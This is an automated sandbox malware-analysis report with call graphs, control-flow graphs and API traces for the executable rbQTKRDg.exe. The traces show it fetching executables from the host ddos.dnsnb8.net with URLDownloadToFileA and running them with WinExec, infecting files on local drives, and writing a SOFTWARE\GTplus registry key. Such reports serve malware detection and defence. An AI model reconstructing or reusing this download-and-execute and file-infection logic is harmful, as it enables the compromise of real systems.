1270->1271 1271->1192 1271->1203 1272->1271 1274 8f1c9c 1273->1274 1276 8f1c94 1273->1276 1275 8f1cae memset memset 1274->1275 1274->1276 1275->1276 1276->1192 1277 8f185b GetSystemTimeAsFileTime srand rand srand rand 1276->1277 1277->1207 1279 8f1b93 1278->1279 1287 8f185b GetSystemTimeAsFileTime srand rand srand rand 1279->1287 1281 8f1bca srand 1282 8f1bd8 rand 1281->1282 1283 8f1c08 1282->1283 1283->1282 1284 8f1c29 memset memcpy lstrcat 1283->1284 1284->1226 1286->1228 1287->1281 1289 8f190c 1288->1289 1290 8f18e0 CloseHandle WaitForSingleObject 1288->1290 1289->1235 1289->1243 1291 8f18fb GetExitCodeProcess 1290->1291 1292 8f1907 CloseHandle 1290->1292 1291->1292 1292->1289 1302 8f185b GetSystemTimeAsFileTime srand rand srand rand 1293->1302 1295 8f27b5 wsprintfA CopyFileA 1296 8f27de wsprintfA 1295->1296 1297 8f2840 1295->1297 1298 8f1973 17 API calls 1296->1298 1297->1154 1299 8f280f 1298->1299 1300 8f2813 DeleteFileA 1299->1300 1301 8f2820 CreateFileA 1299->1301 1300->1301 1301->1297 1302->1295 1304 8f11c6 AdjustTokenPrivileges 1303->1304 1305 8f1200 CloseHandle 1303->1305 1306 8f11f7 CloseHandle 1304->1306 1307 8f11f6 1304->1307 1305->1090 1306->1305 1307->1306 1309 8f123f GetCurrentProcessId OpenProcess 1308->1309 1310 8f1310 1308->1310 1309->1310 1314 8f1262 1309->1314 1310->1088 1317 8f1319 1310->1317 1311 8f12b0 VirtualAlloc 1311->1314 1316 8f12b8 1311->1316 1312 8f12f1 CloseHandle 1312->1310 1313 8f1302 VirtualFree 1312->1313 1313->1310 1314->1311 1314->1312 1315 8f1296 VirtualFree 1314->1315 1314->1316 1315->1311 1316->1312 1318 8f134a 1317->1318 1319 8f132a GetModuleHandleA GetProcAddress 1317->1319 1320 8f1351 memset 1318->1320 1321 8f1363 1318->1321 1319->1318 1319->1321 1320->1321 1321->1088 1321->1096 1322->1109 1324 8f1196 1323->1324 1325 8f10ba 1323->1325 1325->1324 1341 8f185b GetSystemTimeAsFileTime srand rand srand rand 1325->1341 1327 8f1118 wsprintfA wsprintfA URLDownloadToFileA 1328 8f10dc 1327->1328 1329 8f1168 lstrlen Sleep 1327->1329 1332 8f1000 CreateFileA 1328->1332 1329->1325 1333 8f1025 GetFileSize CreateFileMappingA MapViewOfFile 1332->1333 1334 8f1092 WinExec lstrlen 1332->1334 1335 8f107b 1333->1335 1336 8f1057 1333->1336 1334->1324 1334->1325 1337 8f108d CloseHandle 1335->1337 1338 8f1087 CloseHandle 1335->1338 1339 8f1074 UnmapViewOfFile 1336->1339 1340 8f1061 1336->1340 1337->1334 1338->1337 1339->1335 1340->1339 1341->1327 1348 8f2361 1349 8f236b UnmapViewOfFile 1348->1349 1350 8f2374 1348->1350 1349->1350 1351 8f2379 CloseHandle 1350->1351 1352 8f2382 1350->1352 1351->1352 1353 8f2388 CloseHandle 1352->1353 1354 8f2391 1352->1354 1353->1354

                              Callgraph

                              • Executed
                              • Not Executed
                              • Opacity -> Relevance
                              • Disassembly available
                              callgraph 0 Function_008F680F 1 Function_008F120E 2 Function_008F2B8C 35 Function_008F2845 2->35 47 Function_008F2B7D 2->47 3 Function_008F600A 4 Function_008F1B8A 38 Function_008F185B 4->38 5 Function_008F1D8A 6 Function_008F6A84 6->0 53 Function_008F6CF2 6->53 7 Function_008F6B02 42 Function_008F6B63 7->42 8 Function_008F6001 8->3 9 Function_008F1C81 10 Function_008F1581 10->38 11 Function_008F1000 39 Function_008F17D0 11->39 12 Function_008F6D00 31 Function_008F69B0 12->31 12->42 12->53 13 Function_008F119F 14 Function_008F139F 14->1 14->13 19 Function_008F1319 14->19 15 Function_008F189D 16 Function_008F239D 16->15 21 Function_008F1915 16->21 43 Function_008F29E2 16->43 17 Function_008F2D9B 18 Function_008F1099 18->11 18->38 20 Function_008F1718 54 Function_008F2CF0 20->54 22 Function_008F6014 23 Function_008F2692 24 Function_008F6012 25 Function_008F65A6 26 Function_008F67A4 27 Function_008F28B8 27->16 27->23 40 Function_008F1E6E 27->40 27->43 28 Function_008F1638 28->10 28->14 28->18 28->20 33 Function_008F2C48 28->33 28->39 29 Function_008F6834 30 Function_008F6734 30->6 30->7 30->12 32 Function_008F274A 32->38 52 Function_008F1973 32->52 33->2 33->52 34 Function_008F66C8 34->6 34->7 34->12 35->16 35->23 35->32 36 Function_008F235D 37 Function_008F615D 37->34 40->4 40->5 40->9 40->17 40->21 40->38 41 Function_008F1C68 40->41 46 Function_008F2D60 40->46 48 Function_008F1AF9 40->48 51 Function_008F1DF6 40->51 42->26 42->29 42->31 43->27 44 Function_008F14E1 44->28 44->48 45 Function_008F2361 45->17 47->43 48->28 49 Function_008F6CF8 50 Function_008F6076 50->34 52->38 53->49

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                              • String ID: %s*$C:\$Documents and Settings
                              • API String ID: 2826467728-110786608
                              • Opcode ID: e69d4f391a638ccc7b23ce1e16b97cbf1def01e430382637bc64a4a5caf51c0c
                              • Instruction ID: b50b13a324038cd7b4d41dca6797d7a92135881bc05b52203003aaaddf2ecef8
                              • Opcode Fuzzy Hash: e69d4f391a638ccc7b23ce1e16b97cbf1def01e430382637bc64a4a5caf51c0c
                              • Instruction Fuzzy Hash: 464130B240464DAFD721EBB4DC49DFB77ACFB84315F04092AFA44D2111EA34D658CBA2

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 172 8f1099-8f10b4 173 8f10ba-8f10c7 172->173 174 8f1199-8f119c 172->174 175 8f10c8-8f10d4 173->175 176 8f10da 175->176 177 8f1184-8f1190 175->177 178 8f1113-8f1162 call 8f185b wsprintfA * 2 URLDownloadToFileA 176->178 177->175 179 8f1196-8f1198 177->179 182 8f10dc-8f110d call 8f1000 WinExec lstrlen 178->182 183 8f1168-8f1182 lstrlen Sleep 178->183 179->174 182->178 182->179 183->177 183->178
                              APIs
                                • Part of subcall function 008F185B: GetSystemTimeAsFileTime.KERNEL32(008F1F92,00000000,?,00000000,?,?,?,008F1F92,?,00000000,00000002), ref: 008F1867
                                • Part of subcall function 008F185B: srand.MSVCRT ref: 008F1878
                                • Part of subcall function 008F185B: rand.MSVCRT ref: 008F1880
                                • Part of subcall function 008F185B: srand.MSVCRT ref: 008F1890
                                • Part of subcall function 008F185B: rand.MSVCRT ref: 008F1894
                              • WinExec.KERNEL32(?,00000005), ref: 008F10F1
                              • lstrlen.KERNEL32(008F4748), ref: 008F10FA
                              • wsprintfA.USER32 ref: 008F112A
                              • wsprintfA.USER32 ref: 008F1143
                              • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 008F115B
                              • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 008F1169
                              • Sleep.KERNEL32 ref: 008F1179
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                              • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                              • API String ID: 1280626985-762681358
                              • Opcode ID: fafdb338f5d3a8a4bc4a2ac3611ee3d0b290efa07bae68c98fea2c26eb14cbec
                              • Instruction ID: 67e952af2c9f49f86e3115d12a5b26da9a4e5713ac91ec99c71e9f5bfdbdccee
                              • Opcode Fuzzy Hash: fafdb338f5d3a8a4bc4a2ac3611ee3d0b290efa07bae68c98fea2c26eb14cbec
                              • Instruction Fuzzy Hash: CF212775A0020CFADB209BB0DC49EBBBBB8FB55315F115096E600E2160DB749A98CF60

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 216 8f1718-8f1733 GetSystemTimeAsFileTime 217 8f1735-8f1752 SHSetValueA 216->217 218 8f1754-8f1758 216->218 219 8f17c6-8f17cd 217->219 218->219 220 8f175a-8f1784 SHGetValueA 218->220 220->219 221 8f1786-8f17b3 call 8f2cf0 * 2 220->221 221->219 226 8f17b5 221->226 227 8f17bf 226->227 228 8f17b7-8f17bd 226->228 227->219 228->219 228->227
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe), ref: 008F1729
                              • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 008F174C
                              • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 008F177C
                              • __aulldiv.LIBCMT ref: 008F1796
                              • __aulldiv.LIBCMT ref: 008F17A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: TimeValue__aulldiv$FileSystem
                              • String ID: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe$SOFTWARE\GTplus$Time
                              • API String ID: 541852442-650092075
                              • Opcode ID: 534c0934c389bd6989df8f2c24ad930339df3acfc72ad213c14be5b356d78415
                              • Instruction ID: c3404f0dd8de6a714d7f946ed67ca4a3896d8f2ef327c4253759f07942496076
                              • Opcode Fuzzy Hash: 534c0934c389bd6989df8f2c24ad930339df3acfc72ad213c14be5b356d78415
                              • Instruction Fuzzy Hash: E8114CB2A0020DBBDF11AAB4C889FBF7BB8FB44B14F108115FA14E6284D6759A448B60

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 229 8f6076-8f6079 230 8f607b-8f6080 229->230 231 8f60e0-8f60eb 229->231 232 8f60f7-8f60f8 230->232 233 8f6082-8f6085 230->233 234 8f60ee-8f60f4 231->234 235 8f60fe-8f6106 232->235 236 8f60fa-8f60fc call 8f66c8 232->236 237 8f6087 233->237 238 8f60f6 233->238 234->238 240 8f6108-8f611d 235->240 241 8f6155-8f6189 VirtualFree 235->241 236->235 237->234 242 8f6089-8f6095 237->242 238->232 244 8f611f-8f6121 240->244 247 8f618c-8f6192 241->247 245 8f6097-8f609f 242->245 246 8f60a1-8f60aa 242->246 248 8f6123 244->248 249 8f6151-8f6154 244->249 245->246 250 8f61ba-8f61c8 246->250 251 8f60b0-8f60c1 VirtualAlloc 246->251 255 8f60c7-8f60cf 247->255 256 8f6198-8f61b0 VirtualFree 247->256 248->249 254 8f6125-8f6128 248->254 249->241 252 8f61ca-8f61d7 250->252 253 8f6243-8f6251 250->253 251->255 260 8f61dd-8f61e0 252->260 257 8f6264-8f626f 253->257 258 8f6253 253->258 261 8f612a-8f612e 254->261 262 8f6134-8f613b 254->262 255->247 263 8f60d5-8f60df VirtualAlloc 255->263 256->250 259 8f61b2-8f61b4 256->259 265 8f6271-8f6276 257->265 264 8f6255-8f6258 258->264 259->250 260->253 266 8f61e2-8f61f2 260->266 261->262 273 8f6130-8f6132 261->273 262->273 274 8f613d-8f614f 262->274 263->231 264->257 269 8f625a-8f6262 264->269 270 8f627c-8f6289 265->270 271 8f6389-8f63b1 VirtualProtect 265->271 272 8f61f5-8f61fe 266->272 269->264 285 8f628b 270->285 286 8f6292-8f6298 270->286 277 8f63b7-8f63ba 271->277 275 8f620c-8f6219 272->275 276 8f6200-8f6203 272->276 273->244 274->244 281 8f6238-8f623f 275->281 279 8f621b-8f6228 276->279 280 8f6205-8f6208 276->280 282 8f63fc-8f63ff VirtualProtect 277->282 283 8f63bc-8f63c2 277->283 279->281 287 8f622a-8f6236 280->287 288 8f620a 280->288 281->272 289 8f6241 281->289 284 8f6400-8f6416 282->284 283->283 290 8f63c4 283->290 291 8f6418-8f641d 284->291 292 8f6420-8f6425 284->292 285->286 293 8f62a2-8f62ac 286->293 287->281 288->281 289->260 290->282 294 8f63c6-8f63cf 290->294 295 8f62ae 293->295 296 8f62b1-8f62c8 293->296 297 8f63d4-8f63d8 294->297 298 8f63d1 294->298 295->296 301 8f62ce-8f62d4 296->301 302 8f6373-8f6384 296->302 299 8f63dd-8f63e1 297->299 300 8f63da 297->300 298->297 303 8f63e7-8f63fa VirtualProtect 299->303 304 8f63e3 299->304 300->299 305 8f62da-8f62f1 301->305 306 8f62d6-8f62d9 301->306 302->265 303->277 303->282 304->303 308 8f6365-8f636e 305->308 309 8f62f3-8f62f9 305->309 306->305 308->293 310 8f62fb-8f630f 309->310 311 8f6314-8f6326 309->311 312 8f6426-8f64a9 310->312 313 8f634c-8f6360 311->313 314 8f6328-8f634a 311->314 322 8f64ab-8f64c0 312->322 323 8f6519-8f651c 312->323 313->312 314->308 329 8f6535-8f6537 322->329 330 8f64c2 322->330 324 8f651d-8f651e 323->324 325 8f6583-8f6587 323->325 328 8f6522-8f6533 324->328 327 8f6588-8f658b 325->327 331 8f658d-8f658f 327->331 332 8f65a1-8f65a3 327->332 328->329 333 8f659a 329->333 334 8f6539 329->334 335 8f64f8 330->335 336 8f64c5-8f64cd 330->336 337 8f6591-8f6593 331->337 340 8f659b-8f659d 333->340 338 8f653b-8f6541 334->338 339 8f65b4 334->339 343 8f656c-8f656f 335->343 344 8f64fa-8f64fe 335->344 341 8f64cf-8f64d4 336->341 342 8f6542-8f6545 336->342 337->340 347 8f6595 337->347 338->342 352 8f65be-8f6608 339->352 340->337 348 8f659f 340->348 349 8f6517-8f6518 341->349 350 8f64d6-8f64d9 341->350 351 8f654d-8f6550 342->351 345 8f6572 343->345 344->345 346 8f6500 344->346 353 8f6573-8f6576 345->353 346->328 354 8f6502 346->354 347->333 348->327 349->323 350->351 356 8f64db-8f64f5 350->356 351->352 357 8f6552-8f6556 351->357 358 8f6578-8f657f 353->358 354->353 359 8f6504-8f6513 354->359 356->335 357->358 360 8f6558-8f6569 357->360 358->325 359->329 362 8f6515 359->362 360->343 362->349
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 008F60BE
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 008F60DF
                              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 008F6189
                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 008F61A5
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 32148fd49a2519c3d23ccfb779ab17ddaa61ddf2870ae63f1eec30fcdaa90a80
                              • Instruction ID: 41b97a08bbad1a3a6e8cb4433400587f332216a1d7c0dcee97996e71c1438ece
                              • Opcode Fuzzy Hash: 32148fd49a2519c3d23ccfb779ab17ddaa61ddf2870ae63f1eec30fcdaa90a80
                              • Instruction Fuzzy Hash: 841211725087898FDB328F34CC45BFA3BA0FF06310F1846ADDA85DB292E674A920C755

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 364 8f2b8c-8f2bc6 memset GetLogicalDriveStringsA 365 8f2c09-8f2c28 WaitForMultipleObjects 364->365 366 8f2bc8-8f2bcc 364->366 369 8f2c3c-8f2c45 365->369 370 8f2c2a-8f2c3a CreateThread 365->370 367 8f2bce-8f2bd0 366->367 368 8f2bfa-8f2c07 lstrlen 366->368 367->368 371 8f2bd2-8f2bdc GetDriveTypeA 367->371 368->365 368->366 370->369 371->368 372 8f2bde-8f2be1 371->372 372->368 373 8f2be3-8f2bf6 CreateThread 372->373 373->368
                              APIs
                              • memset.MSVCRT ref: 008F2BA6
                              • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 008F2BB4
                              • GetDriveTypeA.KERNEL32(?), ref: 008F2BD3
                              • CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 008F2BEE
                              • lstrlen.KERNEL32(?), ref: 008F2BFB
                              • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 008F2C16
                              • CreateThread.KERNEL32(00000000,00000000,008F2845,00000000,00000000,00000000), ref: 008F2C3A
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                              • String ID:
                              • API String ID: 1073171358-0
                              • Opcode ID: 7e0da8c2929b9637a5c89ea8a3e8ecaab268f0559269eb8b2150bcb2281eac80
                              • Instruction ID: 3000d8620538905cd3a4401c82c48f2944ec0d86715faa1255151fa0bb325a8b
                              • Opcode Fuzzy Hash: 7e0da8c2929b9637a5c89ea8a3e8ecaab268f0559269eb8b2150bcb2281eac80
                              • Instruction Fuzzy Hash: 2421D2B184015CEFEB209FB4AC84DBF7B6DFB44364B14012AFE92E2161D7248E06CB61

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 16 8f1e6e-8f1e95 call 8f2d60 19 8f1e9c-8f1eaa call 8f1df6 16->19 20 8f1e97 call 8f1d8a 16->20 24 8f2332 19->24 25 8f1eb0-8f1ed9 SetFileAttributesA CreateFileA 19->25 20->19 26 8f2338-8f233b 24->26 25->24 27 8f1edf-8f1f28 call 8f1915 SetFilePointer CreateFileMappingA MapViewOfFile 25->27 28 8f233d-8f2340 UnmapViewOfFile 26->28 29 8f2346-8f2349 26->29 27->24 34 8f1f2e-8f1f39 27->34 28->29 32 8f234b-8f234e CloseHandle 29->32 33 8f2350-8f2354 29->33 32->33 35 8f2356-8f235b CloseHandle 33->35 36 8f2391-8f239a call 8f2d9b 33->36 34->24 37 8f1f3f-8f1f56 34->37 35->36 37->24 39 8f1f5c-8f1f64 37->39 39->24 41 8f1f6a-8f1f70 39->41 41->24 42 8f1f76-8f1f87 call 8f1c81 41->42 42->24 45 8f1f8d-8f1fa7 call 8f185b call 8f1c81 42->45 45->24 50 8f1fad-8f1fb4 45->50 51 8f1fb6-8f1fc5 call 8f1af9 50->51 52 8f2024-8f2045 50->52 51->52 58 8f1fc7-8f1fd2 51->58 52->24 53 8f204b-8f204e 52->53 56 8f2070-8f20f4 call 8f1af9 * 2 call 8f1c68 * 2 memset * 2 53->56 57 8f2050-8f2053 53->57 78 8f20f5-8f20fe 56->78 60 8f2056-8f205a 57->60 58->24 61 8f1fd8-8f1fe7 58->61 60->56 63 8f205c-8f2061 60->63 64 8f1fef-8f2006 call 8f1af9 61->64 65 8f1fe9-8f1fec 61->65 63->24 67 8f2067-8f206e 63->67 73 8f2008-8f200e call 8f1c68 64->73 74 8f2013-8f201e FlushViewOfFile 64->74 65->64 67->60 73->74 74->52 79 8f2130-8f2139 78->79 80 8f2100-8f2114 78->80 83 8f213c-8f2142 79->83 81 8f212d-8f212e 80->81 82 8f2116-8f212a 80->82 81->78 82->81 84 8f215c 83->84 85 8f2144-8f2150 83->85 88 8f215f-8f2162 84->88 86 8f2157-8f215a 85->86 87 8f2152-8f2154 85->87 86->83 87->86 89 8f2164-8f2171 88->89 90 8f2181-8f2184 88->90 91 8f232a-8f232d 89->91 92 8f2177-8f217e 89->92 93 8f218d-8f21ba call 8f1c68 90->93 94 8f2186 90->94 91->88 92->90 97 8f21bc-8f21d0 call 8f1c68 93->97 98 8f21d3-8f220b call 8f1c81 call 8f1c68 93->98 94->93 97->98 105 8f220d-8f2218 call 8f1c68 98->105 106 8f221b-8f221e 98->106 105->106 108 8f2226-8f2328 memcpy UnmapViewOfFile CloseHandle call 8f1b8a call 8f185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 8f1915 CloseHandle 106->108 109 8f2220-8f2223 106->109 108->26 109->108
                              APIs
                              • SetFileAttributesA.KERNEL32(?,00000080,?,008F32B0,00000164,008F2986,?), ref: 008F1EB9
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 008F1ECD
                              • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 008F1EF3
                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 008F1F07
                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 008F1F1D
                              • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 008F201E
                              • memset.MSVCRT ref: 008F20D8
                              • memset.MSVCRT ref: 008F20EA
                              • memcpy.MSVCRT(?,?,00000028,?,?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008F222D
                              • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008F2238
                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008F224A
                              • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008F22C6
                              • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008F22CB
                              • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008F22DD
                              • WriteFile.KERNEL32(000000FF,008F4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008F22F7
                              • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008F230D
                              • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008F2322
                              • UnmapViewOfFile.KERNEL32(?,?,008F32B0,00000164,008F2986,?), ref: 008F2340
                              • CloseHandle.KERNEL32(?,?,008F32B0,00000164,008F2986,?), ref: 008F234E
                              • CloseHandle.KERNEL32(000000FF,?,008F32B0,00000164,008F2986,?), ref: 008F2359
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
                              • String ID:
                              • API String ID: 3043204753-0
                              • Opcode ID: c73f688889eda3f0d5b503b8f8305a1f257858f001a6d96e0046825788f978a2
                              • Instruction ID: 48942b7892aaff6261b2a6905f361d253bce591a1eb4a8c75df940ae17d24177
                              • Opcode Fuzzy Hash: c73f688889eda3f0d5b503b8f8305a1f257858f001a6d96e0046825788f978a2
                              • Instruction Fuzzy Hash: 3CF114B1900609EFCB20DFB8D885ABDBBB5FF08314F10452AE619E66A1D734AD91CF54

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 117 8f1973-8f199a PathFileExistsA 118 8f1ac7-8f1acc 117->118 119 8f19a0-8f19aa 117->119 120 8f1ace 118->120 121 8f1ad0-8f1ad5 118->121 122 8f19af-8f19c2 CreateFileA 119->122 120->121 123 8f1ad7-8f1ad9 121->123 124 8f1af0-8f1af6 121->124 125 8f1a28-8f1a36 GetFileSize 122->125 126 8f19c4-8f19d3 Sleep 122->126 123->124 127 8f1a38-8f1a3b 125->127 128 8f1a87-8f1a8b 125->128 126->122 129 8f19d5-8f1a0b call 8f185b wsprintfA CopyFileA 126->129 127->128 130 8f1a3d-8f1a51 VirtualAlloc 127->130 131 8f1a8d-8f1a90 CloseHandle 128->131 132 8f1a96-8f1a9a 128->132 129->125 143 8f1a0d-8f1a26 CreateFileA 129->143 130->128 134 8f1a53-8f1a57 130->134 131->132 135 8f1aad-8f1ab1 132->135 136 8f1a9c 132->136 138 8f1a59-8f1a6d ReadFile 134->138 139 8f1a80 134->139 141 8f1adb-8f1ae0 135->141 142 8f1ab3-8f1ab6 135->142 140 8f1aa0-8f1aa7 DeleteFileA 136->140 138->128 145 8f1a6f-8f1a7e 138->145 139->128 140->135 146 8f1ae7-8f1aec 141->146 147 8f1ae2-8f1ae5 141->147 142->118 148 8f1ab8-8f1ac1 VirtualFree 142->148 143->125 144 8f1a9e 143->144 144->140 145->138 145->139 146->124 149 8f1aee 146->149 147->146 148->118 149->124
                              APIs
                              • PathFileExistsA.SHLWAPI(008F4E5C,00000000,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe), ref: 008F1992
                              • CreateFileA.KERNEL32(008F4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 008F19BA
                              • Sleep.KERNEL32(00000064), ref: 008F19C6
                              • wsprintfA.USER32 ref: 008F19EC
                              • CopyFileA.KERNEL32(008F4E5C,?,00000000), ref: 008F1A00
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008F1A1E
                              • GetFileSize.KERNEL32(008F4E5C,00000000), ref: 008F1A2C
                              • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 008F1A46
                              • ReadFile.KERNEL32(008F4E5C,008F4E60,00000000,?,00000000), ref: 008F1A65
                              • CloseHandle.KERNEL32(000000FF), ref: 008F1A90
                              • DeleteFileA.KERNEL32(?), ref: 008F1AA7
                              • VirtualFree.KERNEL32(008F4E60,00000000,00008000), ref: 008F1AC1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
                              • String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
                              • API String ID: 716042067-4219418977
